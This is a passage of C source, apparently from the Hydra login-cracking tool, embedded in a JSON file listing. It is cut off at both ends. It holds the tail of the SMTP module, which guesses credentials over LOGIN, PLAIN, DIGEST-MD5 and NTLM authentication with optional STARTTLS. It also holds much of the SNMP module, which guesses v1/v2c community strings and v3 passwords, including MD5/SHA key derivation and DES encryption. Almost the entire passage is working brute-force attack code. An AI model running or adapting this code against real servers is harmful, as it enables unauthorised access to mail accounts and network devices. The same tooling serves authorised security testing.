sizeof(buffer));\n from64tobits((char *)buffer, buf + 4);\n free(buf);\n\n if (debug)\n hydra_report(stderr, \"DEBUG S: %s\\n\", buffer);\n\n fooptr = buffer2;\n result = sasl_digest_md5(fooptr, login, pass, buffer, miscptr, \"smtp\", NULL, 0, NULL);\n if (result == NULL)\n return 3;\n\n if (debug)\n hydra_report(stderr, \"DEBUG C: %s\\n\", buffer2);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n sprintf(buffer, \"%s\\r\\n\", buffer2);\n } break;\n#endif\n\n case AUTH_NTLM: {\n unsigned char buf1[4096];\n unsigned char buf2[4096];\n\n // send auth and receive challenge\n buildAuthRequest((tSmbNtlmAuthRequest *)buf2, 0, NULL, NULL);\n to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *)buf2));\n sprintf(buffer, \"AUTH NTLM %s\\r\\n\", buf1);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n if (strstr(buf, \"334\") == NULL || strlen(buf) < 8) {\n hydra_report(stderr, \"[ERROR] SMTP NTLM AUTH : %s\\n\", buf);\n free(buf);\n return 3;\n }\n // recover challenge\n from64tobits((char *)buf1, buf + 4);\n free(buf);\n\n buildAuthResponse((tSmbNtlmAuthChallenge *)buf1, (tSmbNtlmAuthResponse *)buf2, 0, login, pass, NULL, NULL);\n to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *)buf2));\n sprintf(buffer, \"%s\\r\\n\", buf1);\n } break;\n\n default:\n /* by default trying AUTH LOGIN */\n sprintf(buffer, \"AUTH LOGIN\\r\\n\");\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n\n /* 504 5.7.4 Unrecognized authentication type */\n if (strstr(buf, \"334\") == NULL) {\n hydra_report(stderr,\n \"[ERROR] SMTP LOGIN AUTH, either this auth is disabled or \"\n \"server is not using auth: %s\\n\",\n buf);\n free(buf);\n return 3;\n }\n free(buf);\n sprintf(buffer2, \"%.250s\", login);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n sprintf(buffer, \"%.250s\\r\\n\", buffer2);\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return (1);\n if (strstr(buf, \"334\") == NULL) {\n hydra_report(stderr, \"[ERROR] SMTP LOGIN AUTH : %s\\n\", buf);\n free(buf);\n return (3);\n }\n free(buf);\n\n sprintf(buffer2, \"%.250s\", pass);\n hydra_tobase64((unsigned char *)buffer2, strlen(buffer2), sizeof(buffer2));\n sprintf(buffer, \"%.250s\\r\\n\", buffer2);\n }\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return (1);\n\n#ifdef LIBOPENSSL\n if (smtp_auth_mechanism == AUTH_DIGESTMD5) {\n if (strstr(buf, \"334\") != NULL && strlen(buf) >= 8) {\n memset(buffer2, 0, sizeof(buffer2));\n from64tobits((char *)buffer2, buf + 4);\n if (strstr(buffer2, \"rspauth=\") != NULL) {\n hydra_report_found_host(port, ip, \"smtp\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n }\n } else\n#endif\n {\n if (strstr(buf, \"235\") != NULL) {\n hydra_report_found_host(port, ip, \"smtp\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n }\n free(buf);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n\n return 2;\n}\n\nvoid service_smtp(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1, i = 0;\n int32_t myport = PORT_SMTP, mysslport = PORT_SMTP_SSL, disable_tls = 1;\n char *buf;\n char *buffer1 = \"EHLO hydra\\r\\n\";\n char *buffer2 = \"HELO hydra\\r\\n\";\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n\n /* receive initial header */\n if ((buf = hydra_receive_line(sock)) == NULL)\n hydra_child_exit(2);\n if (strstr(buf, \"220\") == NULL) {\n hydra_report(stderr, \"[WARNING] SMTP does not allow connecting: %s\\n\", buf);\n free(buf);\n hydra_child_exit(2);\n }\n while (strstr(buf, \"220 \") == NULL) {\n free(buf);\n buf = hydra_receive_line(sock);\n }\n free(buf);\n\n /* send ehlo and receive/ignore reply */\n if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0)\n hydra_child_exit(2);\n\n buf = smtp_read_server_capacity(sock);\n if (buf == NULL)\n hydra_child_exit(2);\n\n if ((miscptr != NULL) && (strlen(miscptr) > 0)) {\n for (i = 0; i < strlen(miscptr); i++)\n miscptr[i] = (char)toupper((int32_t)miscptr[i]);\n\n if (strstr(miscptr, \"TLS\") || strstr(miscptr, \"SSL\") || strstr(miscptr, \"STARTTLS\")) {\n disable_tls = 0;\n }\n }\n#ifdef LIBOPENSSL\n if (!disable_tls) {\n /* if we got a positive answer */\n if (buf[0] == '2') {\n if (strstr(buf, \"STARTTLS\") != NULL) {\n hydra_send(sock, \"STARTTLS\\r\\n\", strlen(\"STARTTLS\\r\\n\"), 0);\n free(buf);\n buf = hydra_receive_line(sock);\n if (buf[0] != '2') {\n hydra_report(stderr, \"[ERROR] TLS negotiation failed, no answer \"\n \"received from STARTTLS request\\n\");\n } else {\n free(buf);\n if ((hydra_connect_to_ssl(sock, hostname) == -1)) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] Can't use TLS\\n\");\n disable_tls = 1;\n run = 1;\n break;\n } else {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] TLS connection done\\n\");\n }\n /* ask again capability request but in TLS mode */\n if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0)\n hydra_child_exit(2);\n buf = smtp_read_server_capacity(sock);\n if (buf == NULL)\n hydra_child_exit(2);\n }\n } else\n hydra_report(stderr, \"[ERROR] option to use TLS/SSL failed as it \"\n \"is not supported by the server\\n\");\n } else\n hydra_report(stderr, \"[ERROR] option to use TLS/SSL failed as it is \"\n \"not supported by the server\\n\");\n }\n#endif\n\n if (buf[0] != '2') {\n if (hydra_send(sock, buffer2, strlen(buffer2), 0) < 0)\n hydra_child_exit(2);\n\n free(buf);\n buf = smtp_read_server_capacity(sock);\n\n if (buf == NULL)\n hydra_child_exit(2);\n }\n\n if ((strstr(buf, \"LOGIN\") == NULL) && (strstr(buf, \"NTLM\") != NULL)) {\n smtp_auth_mechanism = AUTH_NTLM;\n }\n#ifdef LIBOPENSSL\n if ((strstr(buf, \"LOGIN\") == NULL) && (strstr(buf, \"DIGEST-MD5\") != NULL)) {\n smtp_auth_mechanism = AUTH_DIGESTMD5;\n }\n\n if ((strstr(buf, \"LOGIN\") == NULL) && (strstr(buf, \"CRAM-MD5\") != NULL)) {\n smtp_auth_mechanism = AUTH_CRAMMD5;\n }\n#endif\n\n if ((strstr(buf, \"LOGIN\") == NULL) && (strstr(buf, \"PLAIN\") != NULL)) {\n smtp_auth_mechanism = AUTH_PLAIN;\n }\n\n if ((miscptr != NULL) && (strlen(miscptr) > 0)) {\n if (strstr(miscptr, \"LOGIN\"))\n smtp_auth_mechanism = AUTH_LOGIN;\n\n if (strstr(miscptr, \"PLAIN\"))\n smtp_auth_mechanism = AUTH_PLAIN;\n\n#ifdef LIBOPENSSL\n if (strstr(miscptr, \"CRAM-MD5\"))\n smtp_auth_mechanism = AUTH_CRAMMD5;\n\n if (strstr(miscptr, \"DIGEST-MD5\"))\n smtp_auth_mechanism = AUTH_DIGESTMD5;\n#endif\n\n if (strstr(miscptr, \"NTLM\"))\n smtp_auth_mechanism = AUTH_NTLM;\n }\n\n if (verbose) {\n switch (smtp_auth_mechanism) {\n case AUTH_LOGIN:\n hydra_report(stderr, \"[VERBOSE] using SMTP LOGIN AUTH mechanism\\n\");\n break;\n case AUTH_PLAIN:\n hydra_report(stderr, \"[VERBOSE] using SMTP PLAIN AUTH mechanism\\n\");\n break;\n#ifdef LIBOPENSSL\n case AUTH_CRAMMD5:\n hydra_report(stderr, \"[VERBOSE] using SMTP CRAM-MD5 AUTH mechanism\\n\");\n break;\n case AUTH_DIGESTMD5:\n hydra_report(stderr, \"[VERBOSE] using SMTP DIGEST-MD5 AUTH mechanism\\n\");\n break;\n#endif\n case AUTH_NTLM:\n hydra_report(stderr, \"[VERBOSE] using SMTP NTLM AUTH mechanism\\n\");\n break;\n }\n }\n free(buf);\n next_run = 2;\n break;\n case 2: /* run the cracking function */\n next_run = start_smtp(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0) {\n sock = hydra_disconnect(sock);\n }\n hydra_child_exit(0);\n return;\n case 4: /* error exit */\n if (sock >= 0) {\n sock = hydra_disconnect(sock);\n }\n hydra_child_exit(3);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\nint32_t service_smtp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_smtp(const char *service) {\n printf(\"Module smtp is optionally taking one authentication type of:\\n\"\n \" LOGIN (default), PLAIN, CRAM-MD5, DIGEST-MD5, NTLM\\n\\n\"\n \"Additionally TLS encryption via STARTTLS can be enforced with the \"\n \"TLS option.\\n\\n\"\n \"Example: smtp://target/TLS:PLAIN\\n\");\n}\n" }, { "path": "hydra-snmp.c", "content": "#include \"hydra-mod.h\"\n#ifdef LIBOPENSSL\n#include \n#include \n#include \n#include \n#include \n#endif\n\nextern int32_t hydra_data_ready_timed(int32_t socket, long sec, long usec);\n\nextern char *HYDRA_EXIT;\nextern int32_t child_head_no;\n\nchar snmpv3buf[1024], *snmpv3info = NULL;\nint32_t snmpv3infolen = 0, snmpversion = 1, snmpread = 1, hashtype = 1, enctype = 0;\n\nunsigned char snmpv3_init[] = {0x30, 0x3e, 0x02, 0x01, 0x03, 0x30, 0x11, 0x02, 0x04, 0x08, 0x86, 0xdd, 0xf0, 0x02, 0x03, 0x00, 0xff, 0xe3, 0x04, 0x01, 0x04, 0x02, 0x01, 0x03, 0x04, 0x10, 0x30, 0x0e, 0x04, 0x00, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x30, 0x14, 0x04, 0x00, 0x04, 0x00, 0xa0, 0x0e, 0x02, 0x04, 0x3f, 0x44, 0x5c, 0xbc, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x00};\n\nunsigned char snmpv3_get1[] = {0x30, 0x77, 0x02, 0x01, 0x03, 0x30, 0x11, 0x02, 0x04, 0x08, 0x86, 0xdd, 0xef, 0x02, 0x03, 0x00, 0xff, 0xe3, 0x04, 0x01, 0x05, 0x02, 0x01, 0x03};\n\nunsigned char snmpv3_get2[] = {0x30, 0x2e, 0x04, 0x0c, 0x80, 0x00, 0x00, 0x09, 0x03, 0x00, 0x00, 0x1f, 0xca, 0x8d, 0x82, 0x1b, 0x04, 0x00, 0xa0, 0x1c, 0x02, 0x04, 0x3f, 0x44, 0x5c, 0xbb, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x0e, 0x30, 0x0c, 0x06, 0x08, 0x2b, 0x06, 0x01, 0x02, 0x01, 0x01, 0x01, 0x00, 0x05, 0x00};\n\nunsigned char snmpv3_nouser[] = {0x04, 0x00, 0x04, 0x00, 0x04, 0x00};\n\nstruct SNMPV1_A {\n char ID;\n char len;\n char ver[3];\n char comid;\n char comlen;\n};\n\nstruct SNMPV1_A snmpv1_a = {.ID = '\\x30',\n .len = '\\x00',\n .ver = \"\\x02\\x01\\x00\", /* \\x02\\x01\\x01 for snmpv2c, \\x02\\x01\\x03 for snmpv3 */\n .comid = '\\x04',\n .comlen = '\\x00'};\n\nstruct SNMPV1_R {\n unsigned char type[2];\n unsigned char identid[2];\n unsigned char ident[4];\n unsigned char errstat[3];\n unsigned char errind[3];\n unsigned char objectid[2];\n unsigned char object[11];\n unsigned char value[3];\n} snmpv1_r = {\n .type = \"\\xa0\\x1b\", /* GET */\n .identid = \"\\x02\\x04\",\n .ident = \"\\x1a\\x5e\\x97\\x00\", /* random crap :) */\n .errstat = \"\\x02\\x01\\x00\", /* no error */\n .errind = \"\\x02\\x01\\x00\", /* error index 0 */\n .objectid = \"\\x30\\x0d\",\n .object = \"\\x30\\x0b\\x06\\x07\\x2b\\x06\\x01\\x02\\x01\\x01\\x01\", /* sysDescr */\n .value = \"\\x05\\x00\" /* we just read, so value = 0 */\n};\n\nstruct SNMPV1_W {\n unsigned char type[2];\n unsigned char identid[2];\n unsigned char ident[4];\n unsigned char errstat[3];\n unsigned char errind[3];\n unsigned char objectid[2];\n unsigned char object[12];\n unsigned char value[8];\n} snmpv1_w = {\n .type = \"\\xa3\\x21\", /* SET */\n .identid = \"\\x02\\x04\",\n .ident = \"\\x1a\\x5e\\x97\\x22\", /* random crap :) */\n .errstat = \"\\x02\\x01\\x00\", /* no error */\n .errind = \"\\x02\\x01\\x00\", /* error index 0 */\n .objectid = \"\\x30\\x13\", /* string */\n .object = \"\\x30\\x11\\x06\\x08\\x2b\\x06\\x01\\x02\\x01\\x01\\x05\\x00\",\n .value = \"\\x04\\x05Hydra\" /* writing hydra :-) */\n};\n\n#ifdef LIBOPENSSL\nvoid password_to_key_md5(u_char *password, /* IN */\n u_int passwordlen, /* IN */\n u_char *engineID, /* IN - pointer to snmpEngineID */\n u_int engineLength, /* IN - length of snmpEngineID */\n u_char *key) { /* OUT - pointer to caller 16-octet buffer */\n MD5_CTX MD;\n u_char *cp, password_buf[80], *mypass = password, bpass[17];\n u_long password_index = 0, count = 0, i, mylen, myelen = engineLength;\n\n if (strlen(password) > passwordlen)\n passwordlen = strlen(password);\n if (passwordlen > sizeof(bpass) - 1)\n passwordlen = sizeof(bpass) - 1;\n mylen = passwordlen;\n\n if (mylen < 8) {\n memset(bpass, 0, sizeof(bpass));\n strncpy(bpass, password, sizeof(bpass) - 1);\n while (mylen < 8) {\n strcat(bpass, password);\n mylen += passwordlen;\n }\n mypass = bpass;\n }\n if (myelen > 32)\n myelen = 32;\n\n MD5_Init(&MD); /* initialize MD5 */\n /* Use while loop until we've done 1 Megabyte */\n while (count < 1048576) {\n cp = password_buf;\n for (i = 0; i < 64; i++) {\n /* Take the next octet of the password, wrapping */\n /* to the beginning of the password as necessary. */\n *cp++ = mypass[password_index++ % mylen];\n }\n MD5_Update(&MD, password_buf, 64);\n count += 64;\n }\n MD5_Final(key, &MD); /* tell MD5 we're done */\n /* Now localize the key with the engineID and pass */\n /* through MD5 to produce final key */\n /* May want to ensure that engineLength <= 32, */\n /* otherwise need to use a buffer larger than 64 */\n memcpy(password_buf, key, 16);\n memcpy(password_buf + 16, engineID, myelen);\n memcpy(password_buf + 16 + myelen, key, 16);\n MD5_Init(&MD);\n MD5_Update(&MD, password_buf, 32 + myelen);\n MD5_Final(key, &MD);\n return;\n}\n\nvoid password_to_key_sha(u_char *password, /* IN */\n u_int passwordlen, /* IN */\n u_char *engineID, /* IN - pointer to snmpEngineID */\n u_int engineLength, /* IN - length of snmpEngineID */\n u_char *key) { /* OUT - pointer to caller 20-octet buffer */\n SHA_CTX SH;\n u_char *cp, password_buf[80], *mypass = password, bpass[17];\n u_long password_index = 0, count = 0, i, mylen = passwordlen, myelen = engineLength;\n\n if (mylen < 8) {\n memset(bpass, 0, sizeof(bpass));\n strcpy(bpass, password);\n while (mylen < 8) {\n strcat(bpass, password);\n mylen += passwordlen;\n }\n mypass = bpass;\n }\n\n if (myelen > 32)\n myelen = 32;\n\n SHA1_Init(&SH); /* initialize SHA */\n /* Use while loop until we've done 1 Megabyte */\n while (count < 1048576) {\n cp = password_buf;\n for (i = 0; i < 64; i++) {\n /* Take the next octet of the password, wrapping */\n /* to the beginning of the password as necessary. */\n *cp++ = mypass[password_index++ % mylen];\n }\n SHA1_Update(&SH, password_buf, 64);\n count += 64;\n }\n SHA1_Final(key, &SH); /* tell SHA we're done */\n /* Now localize the key with the engineID and pass */\n /* through SHA to produce final key */\n /* May want to ensure that engineLength <= 32, */\n /* otherwise need to use a buffer larger than 72 */\n memcpy(password_buf, key, 20);\n memcpy(password_buf + 20, engineID, myelen);\n memcpy(password_buf + 20 + myelen, key, 20);\n SHA1_Init(&SH);\n SHA1_Update(&SH, password_buf, 40 + myelen);\n SHA1_Final(key, &SH);\n return;\n}\n#endif\n\nint32_t start_snmp(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\\\"\\\"\", *ptr, *login, *pass, buffer[1024], buf[1024], hash[64], key[256] = \"\", salt[8] = \"\";\n int32_t i, j, k, size, off = 0, off2 = 0;\n unsigned char initVect[8], privacy_params[8];\n int32_t engine_boots = 0;\n\n#ifdef LIBOPENSSL\n DES_key_schedule symcbc;\n#endif\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n if (snmpversion < 3) {\n /* do we attack snmp v1 or v2c? */\n if (snmpversion == 2) {\n snmpv1_a.ver[2] = '\\x01';\n }\n\n if (snmpread) {\n size = sizeof(snmpv1_r);\n } else {\n size = sizeof(snmpv1_w);\n }\n\n snmpv1_a.comlen = (char)strlen(pass);\n snmpv1_a.len = snmpv1_a.comlen + size + sizeof(snmpv1_a) - 3;\n\n i = sizeof(snmpv1_a);\n memcpy(buffer, &snmpv1_a, i);\n strcpy(buffer + i, pass);\n i += strlen(pass);\n\n if (snmpread) {\n memcpy(buffer + i, &snmpv1_r, size);\n i += sizeof(snmpv1_r);\n } else {\n memcpy(buffer + i, &snmpv1_w, size);\n i += sizeof(snmpv1_w);\n }\n } else { // snmpv3\n if (enctype == 0) {\n memcpy(buffer, snmpv3_get1, sizeof(snmpv3_get1));\n i = sizeof(snmpv3_get1);\n } else {\n memcpy(buffer + 1, snmpv3_get1, sizeof(snmpv3_get1));\n buffer[0] = buffer[1];\n memset(buffer + 1, 0x81, 2);\n i = sizeof(snmpv3_get1) + 1;\n off2 = 1;\n }\n\n memcpy(buffer + i, snmpv3info, snmpv3infolen);\n\n if (hashtype > 0) {\n off = 12;\n#ifdef LIBOPENSSL\n if (hashtype == 1) {\n password_to_key_md5(pass, strlen(pass), snmpv3info + 6, snmpv3info[5], key);\n } else {\n password_to_key_sha(pass, strlen(pass), snmpv3info + 6, snmpv3info[5], key);\n }\n#endif\n if (enctype > 0) {\n off += 8;\n buffer[20 + off2] = 7;\n }\n } else {\n ptr = login;\n login = pass;\n pass = ptr;\n buffer[20] = 4;\n }\n\n buffer[i + 1] = 4 + snmpv3infolen + off + strlen(login);\n buffer[i + 3] = 2 + snmpv3infolen + off + strlen(login);\n if (enctype == 0)\n buffer[1] = 48 + sizeof(snmpv3_get1) + buffer[i + 1];\n i += snmpv3infolen;\n // printf(\"2 + %d + %d + %d = 0x%02x\\n\", off, snmpv3infolen, strlen(login),\n // buffer[1]);\n\n buffer[i] = 0x04;\n buffer[i + 1] = strlen(login);\n memcpy(buffer + i + 2, login, strlen(login));\n i += 2 + strlen(login);\n\n buffer[i] = 0x04;\n if (hashtype > 0) {\n buffer[i + 1] = 12;\n memset(buffer + i + 2, 0, 12);\n off = i + 2;\n i += 2 + 12;\n } else {\n buffer[i + 1] = 0;\n i += 2;\n }\n\n buffer[i] = 0x04;\n if (enctype == 0) {\n buffer[i + 1] = 0x00;\n i += 2;\n } else {\n buffer[i + 1] = 8;\n memcpy(buffer + i + 2, salt, 8); // uninitialized and we don't care\n i += 10;\n }\n\n if (enctype == 0) {\n memcpy(buffer + i, snmpv3_get2, sizeof(snmpv3_get2));\n i += sizeof(snmpv3_get2);\n } else {\n buffer[i] = 4;\n buffer[i + 1] = 0x30;\n\n#ifdef LIBOPENSSL\n\n /*\n //PrivDES::encrypt(const unsigned char *key,\n // const uint32_t key_len,\n // const unsigned char *buffer,\n // const uint32_t buffer_len,\n // unsigned char *out_buffer,\n // uint32_t *out_buffer_len,\n // unsigned char *privacy_params,\n // uint32_t *privacy_params_len,\n // const unsigned long engine_boots,\n // const unsigned long engine_time)\n // last 8 bytes of key are used as base for initialization vector */\n k = 0;\n memcpy((char *)initVect, key + 8, 8);\n // put salt in privacy_params\n j = htonl(engine_boots);\n memcpy(privacy_params, (char *)&j, 4);\n memcpy(privacy_params + 4, salt, 4); // ??? correct?\n // xor initVect with salt\n for (i = 0; i < 8; i++)\n initVect[i] ^= privacy_params[i];\n DES_key_sched((const_DES_cblock *)key, &symcbc);\n DES_ncbc_encrypt(snmpv3_get2 + 2, buf, sizeof(snmpv3_get2) - 2, &symcbc, (const_DES_cblock *)(initVect), DES_ENCRYPT);\n\n#endif\n\n /* for (i = 0; i <= sizeof(snmpv3_get2) - 8; i += 8) {\n DES_ncbc_encrypt(snmpv3_get2 + i, buf + i, 8,\n (const_DES_cblock*)(initVect), DES_ENCRYPT);\n }\n // last part of buffer\n if (buffer_len % 8) {\n unsigned char tmp_buf[8];\n unsigned char *tmp_buf_ptr = tmp_buf;\n int32_t start = buffer_len - (buffer_len % 8);\n memset(tmp_buf, 0, 8);\n for (uint32_t l = start; l < buffer_len; l++)\n *tmp_buf_ptr++ = buffer[l];\n DES_ncbc_encrypt(tmp_buf, buf + start, 1, &symcbc,\n (const_DES_cblock*)(initVect), DES_ENCRYPT); *out_buffer_len =\n buffer_len + 8 - (buffer_len % 8); } else *out_buffer_len = buffer_len;\n */\n // dummy\n k = ((sizeof(snmpv3_get2) - 2) / 8);\n if ((sizeof(snmpv3_get2) - 2) % 8 != 0)\n k++;\n memcpy(buffer + i + 2, buf, k * 8);\n i += k * 8 + 2;\n }\n\n i++; // just to conform with the snmpv1/2 code\n#ifdef LIBOPENSSL\n if (hashtype == 1) {\n HMAC((EVP_MD *)EVP_md5(), key, 16, buffer, i - 1, hash, NULL);\n memcpy(buffer + off, hash, 12);\n } else if (hashtype == 2) {\n HMAC((EVP_MD *)EVP_sha1(), key, 20, buffer, i - 1, hash, NULL);\n memcpy(buffer + off, hash, 12);\n }\n#endif\n }\n\n j = 0;\n do {\n if (hydra_send(s, buffer, i - 1, 0) < 0)\n return 3;\n j++;\n } while (hydra_data_ready_timed(s, 1, 0) <= 0 && j < 3);\n\n if (hydra_data_ready_timed(s, 5, 0) > 0) {\n i = hydra_recv(s, (char *)buf, sizeof(buf));\n\n if (snmpversion < 3) {\n /* stolen from ADMsnmp... :P */\n for (j = 0; j < i; j++) {\n if (buf[j] == '\\x04') { /* community name */\n for (j = j + buf[j + 1]; j + 2 < i; j++) {\n if (buf[j] == '\\xa2') { /* PDU Response */\n for (; j + 2 < i; j++) {\n if (buf[j] == '\\x02') { /* ID */\n for (j = j + (buf[j + 1]); j + 2 < i; j++) {\n if (buf[j] == '\\x02') {\n if (buf[j + 1] == '\\x01') { /* good ! */\n hydra_report_found_host(port, ip, \"snmp\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n }\n }\n }\n }\n }\n }\n }\n }\n } else { // snmpv3 reply\n off = 0;\n if (buf[0] == 0x30) {\n if (buf[4] == 0x03 && buf[5] == 0x30)\n off = 4;\n if (buf[5] == 0x03 && buf[6] == 0x30)\n off = 6;\n if (buf[6] == 0x03 && buf[7] == 0x30)\n off = 6;\n }\n if (off == 0)\n return 3;\n\n if (debug)\n printf(\"[DEBUG] buf[%d + 15] %d\\n\", off, buf[off + 15]);\n k = 3 + off + buf[2 + off];\n if ((j = hydra_memsearch(buf + k, buf[k + 3], snmpv3_nouser, sizeof(snmpv3_nouser))) < 0)\n if ((j = hydra_memsearch(buf + k, buf[k + 3], login, strlen(login))) >= 0) {\n if (snmpv3info[j - 2] == 0x04)\n j -= 2;\n else\n j = -1;\n }\n if (j >= 0) {\n i = buf[k + 3] + 4;\n if (i > sizeof(snmpv3info))\n i = sizeof(snmpv3info);\n memcpy(snmpv3info, buf + k, i);\n snmpv3infolen = j;\n if (debug)\n hydra_dump_asciihex(snmpv3info, snmpv3infolen);\n }\n\n if ((buf[off + 15] & 1) == 1) {\n if (hashtype == 0)\n hydra_report_found_host(port, ip, \"snmp3\", fp);\n else\n hydra_report_found_host(port, ip, \"snmp\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n } else if ((buf[off + 15] & 5) == 4 && hydra_memsearch(buf, i, snmpv3_nouser,\n sizeof(snmpv3_nouser)) >= 0) { // user does not exist\n if (verbose)\n printf(\"[INFO] user %s does not exist, skipping\\n\", login);\n hydra_completed_pair_skip();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n }\n }\n\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n}\n\nvoid service_snmp(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1, i = 0;\n int32_t myport = PORT_SNMP;\n char *lptr;\n\n if (miscptr != NULL) {\n lptr = strtok(miscptr, \":\");\n while (lptr != NULL) {\n if (strcasecmp(lptr, \"1\") == 0)\n snmpversion = 1;\n else if (strcasecmp(lptr, \"2\") == 0)\n snmpversion = 2;\n else if (strcasecmp(lptr, \"3\") == 0)\n snmpversion = 3;\n else if (strcasecmp(lptr, \"PLAIN\") == 0)\n hashtype = 0;\n else if (strcasecmp(lptr, \"MD5\") == 0)\n hashtype = 1;\n else if (strncasecmp(lptr, \"R\", 1) == 0)\n snmpread = 1;\n else if (strncasecmp(lptr, \"W\", 1) == 0)\n snmpread = 0;\n else if (strncasecmp(lptr, \"SHA\", 3) == 0)\n hashtype = 2;\n else if (strcasecmp(lptr, \"DES\") == 0)\n enctype = 1;\n else if (strcasecmp(lptr, \"AES\") == 0)\n enctype = 2;\n else {\n fprintf(stderr, \"[ERROR] unknown optional parameter: %s\\n\", lptr);\n hydra_child_exit(2);\n }\n lptr = strtok(NULL, \":\");\n }\n }\n if (hashtype == 0)\n enctype = 0;\n\n if (port != 0)\n myport = port;\n sock = hydra_connect_udp(ip, myport);\n port = myport;\n\n if (debug)\n printf(\"[DEBUG] snmpv%d, isread %d, hashtype %d, enctype %d\\n\", snmpversion, snmpread, hashtype, enctype);\n\n hydra_register_socket(sp);\n\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, no socket available\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n\n if (snmpversion == 3) {\n next_run = 0;\n while (snmpv3info == NULL && next_run < 3) {\n hydra_send(sock, snmpv3_init, sizeof(snmpv3_init), 0);\n if (hydra_data_ready_timed(sock, 5, 0) > 0) {\n if ((i = hydra_recv(sock, (char *)snmpv3buf, sizeof(snmpv3buf))) > 30) {\n if (snmpv3buf[4] == 3 && snmpv3buf[5] == 0x30) {\n snmpv3info = snmpv3buf + 7 + snmpv3buf[6];\n snmpv3infolen = snmpv3info[3] + 4;\n if (snmpv3info + snmpv3infolen <= snmpv3buf + sizeof(snmpv3buf)) {\n while (snmpv3info[snmpv3infolen - 2] == 4 && snmpv3info[snmpv3infolen - 1] == 0 && snmpv3infolen > 1)\n snmpv3infolen -= 2;\n if (debug)\n hydra_dump_asciihex(snmpv3info, snmpv3infolen);\n if (snmpv3info[10] == 3 && child_head_no == 0)\n printf(\"[INFO] Remote device MAC address is \"\n \"%02x:%02x:%02x:%02x:%02x:%02x\\n\",\n (unsigned char)snmpv3info[12], (unsigned char)snmpv3info[13], (unsigned char)snmpv3info[14], (unsigned char)snmpv3info[15], (unsigned char)snmpv3info[16], (unsigned char)snmpv3info[12]);\n }\n }\n }\n }\n next_run++;\n }\n if (snmpv3info == NULL || i < snmpv3info + snmpv3infolen - snmpv3buf) {\n hydra_report(stderr, \"No valid reply from snmp server, exiting!\\n\");\n hydra_child_exit(2);\n }\n }\n\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n run = 3;\n\n while (1) {\n switch (run) {\n case 1: /* 